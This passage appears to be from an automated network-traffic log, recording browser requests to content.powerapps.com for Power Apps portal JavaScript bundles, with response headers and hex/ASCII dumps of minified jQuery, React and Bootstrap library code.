e?s.apply(this,arguments):this.animate(ut(n,!0),e,t,i)}}),C.each({slideDown:ut("show"),slideUp:ut("hide"),slideToggle:ut("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},func
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 6f 6e 28 65 2c 74 2c 69 29 7b 72 65 74 75 72 6e 20 43 2e 61 6a 61 78 28 7b 75 72 6c 3a 65 2c 74 79 70 65 3a 22 47 45 54 22 2c 64 61 74 61 54 79 70 65 3a 22 73 63 72 69 70 74 22 2c 63 61 63 68 65 3a 21 30 2c 61 73 79 6e 63 3a 21 31 2c 67 6c 6f 62 61 6c 3a 21 31 2c 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 74 65 78 74 20 73 63 72 69 70 74 22 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 2c 64 61 74 61 46 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 43 2e 67 6c 6f 62 61 6c 45 76 61 6c 28 65 2c 74 2c 69 29 7d 7d 29 7d 2c 43 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 77 72 61 70 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 74 68 69 73 5b 30 5d 26 26 28 79 28 65 29 26 26 28 65 3d 65 2e 63 61 6c 6c 28 74 68 69 73 5b 30 5d 29 Data Ascii: on(e,t,i){return C.ajax({url:e,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,converters:{"text script":function(){}},dataFilter:function(e){C.globalEval(e,t,i)}})},C.fn.extend({wrapAll:function(e){var t;return this[0]&&(y(e)&&(e=e.call(this[0])
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 20 65 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 28 61 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 61 2e 66 6e 2e 63 73 73 2e 63 61 6c 6c 28 6e 2c 65 2c 74 29 7d 29 2c 74 68 69 73 29 3a 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 78 28 65 29 2c 69 3d 74 2c 43 2e 74 65 73 74 28 69 29 26 26 53 2e 74 65 73 74 28 69 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 69 2e 73 6c 69 63 65 28 31 29 29 7c 7c 61 2e 63 73 73 4e 75 6d 62 65 72 5b 74 5d 7c 7c 6f 28 22 63 73 73 2d 6e 75 6d 62 65 72 22 2c 27 4e 75 6d 62 65 72 2d 74 79 70 65 64 20 76 61 6c 75 65 73 20 61 72 65 20 64 65 70 72 65 63 61 74 65 64 20 66 6f 72 20 6a 51 75 65 72 79 2e 66 6e 2e 63 73 73 28 20 22 27 2b 65 2b 27 22 2c 20 76 61 Data Ascii: e&&!Array.isArray(e)?(a.each(e,function(e,t){a.fn.css.call(n,e,t)}),this):("number"==typeof t&&(t=x(e),i=t,C.test(i)&&S.test(i[0].toUpperCase()+i.slice(1))\|\|a.cssNumber[t]\|\|o("css-number",'Number-typed values are deprecated for jQuery.fn.css( "'+e+'", va
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 69 2c 6e 2c 73 29 7b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 65 26 26 28 74 3d 74 2e 5f 77 72 61 70 70 65 64 29 3b 69 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 65 26 26 28 69 3d 69 2e 5f 77 72 61 70 70 65 64 29 3b 76 61 72 20 72 3d 70 2e 63 61 6c 6c 28 74 29 3b 69 66 28 72 21 3d 3d 70 2e 63 61 6c 6c 28 69 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6a 26 26 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 72 26 26 4c 28 74 29 29 7b 69 66 28 21 4c 28 69 29 29 72 65 74 75 72 6e 21 31 3b 72 3d 73 65 7d 73 77 69 74 63 68 28 72 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 52 65 67 45 78 70 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 53 74 72 69 6e 67 5d 22 3a 72 65 74 75 72 6e 22 22 2b 74 3d 3d 22 22 2b 69 3b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 4e Data Ascii: i,n,s){t instanceof ie&&(t=t._wrapped);i instanceof ie&&(i=i._wrapped);var r=p.call(t);if(r!==p.call(i))return!1;if(j&&"[object Object]"==r&&L(t)){if(!L(i))return!1;r=se}switch(r){case"[object RegExp]":case"[object String]":return""+t==""+i;case"[object N
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 6e 67 74 68 2c 73 3d 30 3b 73 3c 6e 3b 2b 2b 73 29 69 2e 70 75 73 68 28 74 28 65 5b 73 5d 2c 73 29 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 29 64 28 74 2c 69 29 26 26 28 65 5b 69 5d 3d 74 5b 69 5d 29 3b 72 65 74 75 72 6e 20 64 28 74 2c 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 65 2e 74 6f 53 74 72 69 6e 67 3d 74 2e 74 6f 53 74 72 69 6e 67 29 2c 64 28 74 2c 22 76 61 6c 75 65 4f 66 22 29 26 26 28 65 2e 76 61 6c 75 65 4f 66 3d 74 2e 76 61 6c 75 65 4f 66 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 69 2c 6e 29 7b 72 65 74 75 72 6e 20 4d 74 28 65 2c 74 2c 69 2c 6e 2c 21 30 29 2e 75 74 63 28 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c Data Ascii: ngth,s=0;s<n;++s)i.push(t(e[s],s));return i}function m(e,t){for(var i in t)d(t,i)&&(e[i]=t[i]);return d(t,"toString")&&(e.toString=t.toString),d(t,"valueOf")&&(e.valueOf=t.valueOf),e}function g(e,t,i,n){return Mt(e,t,i,n,!0).utc()}function v(e){return nul
2025-01-15 14:11:59 UTC	16384	IN	Data Raw: 3f 3a 3a 28 5c 64 5c 64 29 29 3f 5c 73 28 3f 3a 28 55 54 7c 47 4d 54 7c 5b 45 43 4d 50 5d 5b 53 44 5d 54 29 7c 28 5b 5a 7a 5d 29 7c 28 5b 2b 2d 5d 5c 64 7b 34 7d 29 29 24 2f 2c 62 74 3d 7b 55 54 3a 30 2c 47 4d 54 3a 30 2c 45 44 54 3a 2d 32 34 30 2c 45 53 54 3a 2d 33 30 30 2c 43 44 54 3a 2d 33 30 30 2c 43 53 54 3a 2d 33 36 30 2c 4d 44 54 3a 2d 33 36 30 2c 4d 53 54 3a 2d 34 32 30 2c 50 44 54 3a 2d 34 32 30 2c 50 53 54 3a 2d 34 38 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 76 61 72 20 74 2c 69 2c 6e 2c 73 2c 72 2c 6f 2c 61 3d 65 2e 5f 69 2c 6c 3d 70 74 2e 65 78 65 63 28 61 29 7c 7c 66 74 2e 65 78 65 63 28 61 29 2c 61 3d 67 74 2e 6c 65 6e 67 74 68 2c 75 3d 76 74 2e 6c 65 6e 67 74 68 3b 69 66 28 6c 29 7b 66 6f 72 28 76 28 65 29 2e 69 73 6f 3d 21 30 Data Ascii: ?::(\d\d))?\s(?:(UT\|GMT\|[ECMP][SD]T)\|([Zz])\|([+-]\d{4}))$/,bt={UT:0,GMT:0,EDT:-240,EST:-300,CDT:-300,CST:-360,MDT:-360,MST:-420,PDT:-420,PST:-480};function wt(e){var t,i,n,s,r,o,a=e._i,l=pt.exec(a)\|\|ft.exec(a),a=gt.length,u=vt.length;if(l){for(v(e).iso=!0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:59 UTC	406	OUT	GET /resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:00 UTC	827	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: application/x-javascript Content-Length: 80 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: ga00000JW x-ms-static-content: ZE00000B6 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 3d2dd107-7115-4fd0-8b57-5ed629769f71 x-ms-correlation-id: 80bf83c5-0787-4274-96fc-e33c1607ba99 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=30.5,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141200Z-1848b945c764csbghC1MNZ7ws8000000016g00000000dag9 X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:00 UTC	80	IN	Data Raw: 24 28 28 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 61 64 41 6c 6c 50 63 66 43 6f 6e 74 72 6f 6c 73 4f 6e 50 61 67 65 29 7b 77 69 6e 64 6f 77 2e 6c 6f 61 64 41 6c 6c 50 63 66 43 6f 6e 74 72 6f 6c 73 4f 6e 50 61 67 65 28 29 7d 7d 29 3b Data Ascii: $(()=>{if(window.loadAllPcfControlsOnPage){window.loadAllPcfControlsOnPage()}});

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	399	OUT	GET /resource/powerappsportal/dist/pcf.bundle-9183da3d63.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:00 UTC	827	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: application/x-javascript Content-Length: 856286 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000CP x-ms-static-content: ZE0000072 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 88ad58a4-2cb6-411e-9318-bec0fe023ab1 x-ms-correlation-id: 4c44a368-58a7-449a-a6ea-c6db38b8813d x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=31.5,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141200Z-17f859c6f6bmspknhC1MNZz6rc00000000p0000000008pve X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:00 UTC	15557	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 69 66 28 72 5b 65 5d 29 72 65 74 75 72 6e 20 72 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 72 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 74 2e 6c 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 6f 2e 6d 3d 6e 2c 6f 2e 63 3d 72 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6f 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 7d 29 7d 2c 6f 2e 72 3d 66 75 6e Data Ascii: !function(n){var r={};function o(e){if(r[e])return r[e].exports;var t=r[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,o),t.l=!0,t.exports}o.m=n,o.c=r,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=fun
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 75 74 65 28 6f 2c 73 5b 6f 5d 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 24 28 77 69 6e 64 6f 77 29 29 26 26 77 69 6e 64 6f 77 2e 46 65 6c 61 43 6f 6e 66 69 67 29 66 6f 72 28 76 61 72 20 63 20 69 6e 20 77 69 6e 64 6f 77 2e 46 65 6c 61 43 6f 6e 66 69 67 2e 73 74 79 6c 65 4e 6f 64 65 41 74 74 72 69 62 75 74 65 73 29 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 63 2c 77 69 6e 64 6f 77 2e 46 65 6c 61 43 6f 6e 66 69 67 2e 73 74 79 6c 65 4e 6f 64 65 41 74 74 72 69 62 75 74 65 73 5b 63 5d 29 3b 72 65 74 75 72 6e 20 6e 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 64 61 74 61 2d 66 65 6c 61 2d 74 79 70 65 5d 22 29 2c 28 61 3d Data Ascii: ute(o,s[o]);if(void 0!==("undefined"==typeof window?"undefined":$(window))&&window.FelaConfig)for(var c in window.FelaConfig.styleNodeAttributes)u.setAttribute(c,window.FelaConfig.styleNodeAttributes[c]);return n=l.querySelectorAll("[data-fela-type]"),(a=
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 3d 3d 3d 75 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 70 28 75 29 29 29 7b 74 5b 73 5d 3d 65 28 7b 7d 2c 63 2c 75 29 3b 63 6f 6e 74 69 6e 75 65 7d 7d 74 5b 73 5d 3d 75 7d 7d 72 65 74 75 72 6e 20 74 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 7d 2c 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 65 29 7d 3b 76 61 72 20 72 3d 28 6e 3d 6e 28 31 30 29 29 26 26 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 6e 3a 7b 64 65 66 61 75 6c 74 3a 6e Data Ascii: ===u?"undefined":p(u))){t[s]=e({},c,u);continue}}t[s]=u}}return t},e.exports=t.default},,function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){return(0,r.default)(e)};var r=(n=n(10))&&n.__esModule?n:{default:n
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 70 28 22 22 2e 63 6f 6e 63 61 74 28 6f 2e 72 65 70 6c 61 63 65 28 2f 5b 2e 2a 2b 5c 2d 3f 5e 24 7b 7d 28 29 7c 5b 5c 5d 5c 5c 5d 2f 67 2c 22 5c 5c 24 26 22 29 2c 22 5b 2e 5d 28 5b 30 2d 39 61 2d 7a 5f 2d 5d 2b 29 28 5b 5e 7b 5d 2b 29 3f 7b 28 5b 5e 3a 5d 2b 29 3a 28 5b 5e 7d 5d 2b 29 7d 22 29 2c 22 67 69 22 29 3b 75 3d 69 2e 65 78 65 63 28 65 29 3b 29 7b 75 5b 30 5d 3b 76 61 72 20 61 3d 75 5b 31 5d 2c 73 3d 75 5b 32 5d 2c 6c 3d 75 5b 33 5d 2c 75 3d 75 5b 34 5d 3b 72 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 72 65 74 75 72 6e 28 34 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 22 22 29 2b 28 33 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 Data Ascii: p("".concat(o.replace(/[.*+\-?^${}()\|[\]\\]/g,"\\$&"),"[.]([0-9a-z_-]+)([^{]+)?{([^:]+):([^}]+)}"),"gi");u=i.exec(e);){u[0];var a=u[1],s=u[2],l=u[3],u=u[4];r[function(e,t,n,r,o){return(4<arguments.length&&void 0!==o?o:"")+(3<arguments.length&&void 0!==r?r
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 69 67 68 74 20 61 6c 69 67 6e 6d 65 6e 74 2d 62 61 73 65 6c 69 6e 65 20 61 72 61 62 69 63 2d 66 6f 72 6d 20 62 61 73 65 6c 69 6e 65 2d 73 68 69 66 74 20 63 61 70 2d 68 65 69 67 68 74 20 63 6c 69 70 2d 70 61 74 68 20 63 6c 69 70 2d 72 75 6c 65 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 20 63 6f 6c 6f 72 2d 70 72 6f 66 69 6c 65 20 63 6f 6c 6f 72 2d 72 65 6e 64 65 72 69 6e 67 20 64 6f 6d 69 6e 61 6e 74 2d 62 61 73 65 6c 69 6e 65 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 20 66 69 6c 6c 2d 6f 70 61 63 69 74 79 20 66 69 6c 6c 2d 72 75 6c 65 20 66 6c 6f 6f 64 2d 63 6f 6c 6f 72 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 20 66 6f 6e 74 2d 66 61 6d 69 6c Data Ascii: ight alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule color-interpolation color-interpolation-filters color-profile color-rendering dominant-baseline enable-background fill-opacity fill-rule flood-color flood-opacity font-famil
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 65 77 20 4d 61 70 2c 56 74 3d 5b 22 61 62 6f 72 74 22 2c 22 61 62 6f 72 74 22 2c 4b 65 2c 22 61 6e 69 6d 61 74 69 6f 6e 45 6e 64 22 2c 71 65 2c 22 61 6e 69 6d 61 74 69 6f 6e 49 74 65 72 61 74 69 6f 6e 22 2c 51 65 2c 22 61 6e 69 6d 61 74 69 6f 6e 53 74 61 72 74 22 2c 22 63 61 6e 70 6c 61 79 22 2c 22 63 61 6e 50 6c 61 79 22 2c 22 63 61 6e 70 6c 61 79 74 68 72 6f 75 67 68 22 2c 22 63 61 6e 50 6c 61 79 54 68 72 6f 75 67 68 22 2c 22 64 75 72 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 22 64 75 72 61 74 69 6f 6e 43 68 61 6e 67 65 22 2c 22 65 6d 70 74 69 65 64 22 2c 22 65 6d 70 74 69 65 64 22 2c 22 65 6e 63 72 79 70 74 65 64 22 2c 22 65 6e 63 72 79 70 74 65 64 22 2c 22 65 6e 64 65 64 22 2c 22 65 6e 64 65 64 22 2c 22 65 72 72 6f 72 22 2c 22 65 72 72 6f 72 22 2c 22 67 Data Ascii: ew Map,Vt=["abort","abort",Ke,"animationEnd",qe,"animationIteration",Qe,"animationStart","canplay","canPlay","canplaythrough","canPlayThrough","durationchange","durationChange","emptied","emptied","encrypted","encrypted","ended","ended","error","error","g
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 75 73 65 6f 76 65 72 22 3d 3d 3d 65 7c 7c 22 70 6f 69 6e 74 65 72 6f 76 65 72 22 3d 3d 3d 65 2c 61 3d 22 6d 6f 75 73 65 6f 75 74 22 3d 3d 3d 65 7c 7c 22 70 6f 69 6e 74 65 72 6f 75 74 22 3d 3d 3d 65 3b 69 66 28 69 26 26 30 3d 3d 28 33 32 26 6f 29 26 26 28 6e 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 7c 7c 6e 2e 66 72 6f 6d 45 6c 65 6d 65 6e 74 29 7c 7c 21 61 26 26 21 69 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 28 69 3d 72 2e 77 69 6e 64 6f 77 3d 3d 3d 72 3f 72 3a 28 69 3d 72 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 3f 69 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 69 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 3a 77 69 6e 64 6f 77 2c 61 29 3f 28 61 3d 74 2c 6e 75 6c 6c 21 3d 3d 28 74 3d 28 74 3d 6e 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 7c 7c 6e 2e 74 6f 45 Data Ascii: useover"===e\|\|"pointerover"===e,a="mouseout"===e\|\|"pointerout"===e;if(i&&0==(32&o)&&(n.relatedTarget\|\|n.fromElement)\|\|!a&&!i)return null;(i=r.window===r?r:(i=r.ownerDocument)?i.defaultView\|\|i.parentWindow:window,a)?(a=t,null!==(t=(t=n.relatedTarget\|\|n.toE
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 75 6c 6c 21 3d 3d 6e 29 7b 73 77 69 74 63 68 28 6e 2e 24 24 74 79 70 65 6f 66 29 7b 63 61 73 65 20 65 65 3a 72 65 74 75 72 6e 20 6e 2e 6b 65 79 3d 3d 3d 6f 3f 6e 2e 74 79 70 65 3d 3d 3d 6e 65 3f 63 28 65 2c 74 2c 6e 2e 70 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 2c 72 2c 6f 29 3a 6c 28 65 2c 74 2c 6e 2c 72 29 3a 6e 75 6c 6c 3b 63 61 73 65 20 74 65 3a 72 65 74 75 72 6e 20 6e 2e 6b 65 79 3d 3d 3d 6f 3f 75 28 65 2c 74 2c 6e 2c 72 29 3a 6e 75 6c 6c 7d 69 66 28 5f 69 28 6e 29 7c 7c 6d 65 28 6e 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 6f 3f 6e 75 6c 6c 3a 63 28 65 2c 74 2c 6e 2c 72 2c 6e 75 6c 6c 29 3b 50 69 28 65 2c 6e 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c Data Ascii: bject"==typeof n&&null!==n){switch(n.$$typeof){case ee:return n.key===o?n.type===ne?c(e,t,n.props.children,r,o):l(e,t,n,r):null;case te:return n.key===o?u(e,t,n,r):null}if(_i(n)\|\|me(n))return null!==o?null:c(e,t,n,r,null);Pi(e,n)}return null}function v(e,
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 42 61 28 65 2c 74 2c 6e 2c 72 2c 6f 2c 69 29 7b 52 61 28 65 2c 74 29 3b 76 61 72 20 61 3d 30 21 3d 28 36 34 26 74 2e 65 66 66 65 63 74 54 61 67 29 3b 69 66 28 21 72 26 26 21 61 29 72 65 74 75 72 6e 20 6f 26 26 5f 6f 28 74 2c 6e 2c 21 31 29 2c 51 61 28 65 2c 74 2c 69 29 3b 72 3d 74 2e 73 74 61 74 65 4e 6f 64 65 2c 6b 61 2e 63 75 72 72 65 6e 74 3d 74 3b 76 61 72 20 73 3d 61 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 6e 2e 67 65 74 44 65 72 69 76 65 64 53 74 61 74 65 46 72 6f 6d 45 72 72 6f 72 3f 6e 75 6c 6c 3a 72 2e 72 65 6e 64 65 72 28 29 3b 72 65 74 75 72 6e 20 74 2e 65 66 66 65 63 74 54 61 67 7c 3d 31 2c 6e 75 6c 6c 21 3d 3d 65 26 26 61 3f 28 74 2e 63 68 69 6c 64 3d Data Ascii: (e,t,n,r,i,o)}function Ba(e,t,n,r,o,i){Ra(e,t);var a=0!=(64&t.effectTag);if(!r&&!a)return o&&_o(t,n,!1),Qa(e,t,i);r=t.stateNode,ka.current=t;var s=a&&"function"!=typeof n.getDerivedStateFromError?null:r.render();return t.effectTag\|=1,null!==e&&a?(t.child=
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 6e 2c 72 29 2c 74 3d 74 2e 73 69 62 6c 69 6e 67 3b 6e 75 6c 6c 21 3d 3d 74 3b 29 65 28 74 2c 6e 2c 72 29 2c 74 3d 74 2e 73 69 62 6c 69 6e 67 7d 28 65 2c 6e 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 73 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 6f 2c 69 3d 74 2c 61 3d 21 31 3b 3b 29 7b 69 66 28 21 61 29 7b 61 3d 69 2e 72 65 74 75 72 6e 3b 65 3a 66 6f 72 28 3b 3b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 77 28 31 36 30 29 29 3b 73 77 69 74 63 68 28 72 3d 61 2e 73 74 61 74 65 4e 6f 64 65 2c 61 2e 74 61 67 29 7b 63 61 73 65 20 35 3a 6f 3d 21 31 3b 62 72 65 61 6b 20 65 3b 63 61 73 65 20 33 3a 63 61 73 65 20 34 3a 72 3d 72 2e 63 6f 6e 74 61 69 6e 65 72 49 6e 66 6f 2c 6f 3d 21 30 3b 62 72 65 61 6b 20 65 7d 61 3d 61 Data Ascii: n,r),t=t.sibling;null!==t;)e(t,n,r),t=t.sibling}(e,n,t)}function cs(e,t,n){for(var r,o,i=t,a=!1;;){if(!a){a=i.return;e:for(;;){if(null===a)throw Error(w(160));switch(r=a.stateNode,a.tag){case 5:o=!1;break e;case 3:case 4:r=r.containerInfo,o=!0;break e}a=a

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	417	OUT	GET /resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:00 UTC	853	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: application/x-javascript Content-Length: 92085 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA000005M x-ms-static-content: ze000001A Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 6de70faf-183c-4096-8457-b418cce7f6bd x-ms-correlation-id: 65f32ffc-0a37-437e-9363-a6e39a47939d x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=10.8,x-ms-igw-req-overhead;dur=0.4 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141200Z-1848b945c76q7864hC1MNZgya800000001c00000000028p6 X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:00 UTC	15531	IN	Data Raw: 2f 2a 21 0d 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0d 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0d 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 20 2a 2f 0d 